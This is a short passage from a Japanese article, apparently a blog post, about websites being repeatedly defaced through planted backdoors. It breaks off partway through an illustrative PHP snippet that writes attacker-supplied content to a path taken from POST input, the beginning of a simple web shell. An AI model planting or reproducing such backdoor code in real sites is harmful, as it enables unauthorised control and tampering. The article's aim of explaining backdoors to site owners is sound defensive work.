はじめに Webサイトのソースが改ざんされて、見れなくなった。 全然違うページが表示されている。 コードを修正してもすぐにまた改ざんされる。 ・・・といったご相談が相次いでおります。 Webサイトの何らかの脆弱性を突かれ、「バックドア」を設置された、というパターンです。 攻撃を受けたサイトのリカバリー対応は、本当に神経を使いますし、骨が折れます。 (そして何より生産的ではありません・・・) 折角なので、バックドアに対する理解を深めていただけると嬉しいなと思い、記事を書きました。 バックドアとはこんなもの 皆さん言葉は知っていると思いますが、 「バックドア」とは、ざっくり言うとこんなイメージのファイルです。 (詳細は後述しますが、これはあくまでイメージです。) <?php $path = __DIR__ . '/' . $_POST['path']; $content = $_POST['c